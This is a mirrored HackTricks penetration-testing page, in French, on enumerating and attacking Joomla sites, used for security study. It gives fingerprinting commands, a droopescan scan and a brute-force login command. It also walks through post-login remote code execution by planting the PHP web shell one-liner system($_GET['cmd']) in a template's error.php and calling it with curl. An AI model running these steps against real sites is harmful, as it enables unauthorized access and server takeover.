mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
6.3 KiB
6.3 KiB
Joomla
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou souhaitez-vous accéder à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT!
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Obtenez le merchandising officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts hacktricks et hacktricks-cloud.
Statistiques Joomla
Joomla collecte certaines statistiques d'utilisation anonymes telles que la répartition des versions de Joomla, PHP et des bases de données ainsi que les systèmes d'exploitation de serveur utilisés sur les installations Joomla. Ces données peuvent être interrogées via leur API publique.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
Énumération
Découverte/Empreinte
- Vérifier le meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Version
- Dans /administrator/manifests/files/joomla.xml **** vous pouvez voir la version.
- Dans /language/en-GB/en-GB.xml vous pouvez obtenir la version de Joomla.
- Dans plugins/system/cache/cache.xml vous pouvez voir une version approximative.
Automatique
droopescan scan joomla --url http://joomla-site.local/
Brute-Force
Vous pouvez utiliser ce script pour tenter de forcer brutalement le login.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
Si vous avez réussi à obtenir des identifiants administrateur, vous pouvez réaliser une RCE à l'intérieur en ajoutant un extrait de code PHP pour obtenir une RCE. Nous pouvons le faire en personnalisant un template.
- Cliquez sur
Templates
en bas à gauche sousConfiguration
pour afficher le menu des templates. - Cliquez sur le nom d'un template. Choisissons
protostar
sous l'en-tête de colonneTemplate
. Cela nous amènera à la pageTemplates: Customise
. - Enfin, vous pouvez cliquer sur une page pour afficher le code source de la page. Choisissons la page
error.php
. Nous ajouterons un one-liner PHP pour exécuter du code comme suit :system($_GET['cmd']);
- Enregistrez & Fermez
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Vous travaillez dans une entreprise de cybersécurité ? Vous souhaitez voir votre entreprise annoncée dans HackTricks ? ou souhaitez-vous accéder à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT!
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Obtenez le merchandising officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de hacking en soumettant des PRs au dépôt hacktricks et au dépôt hacktricks-cloud.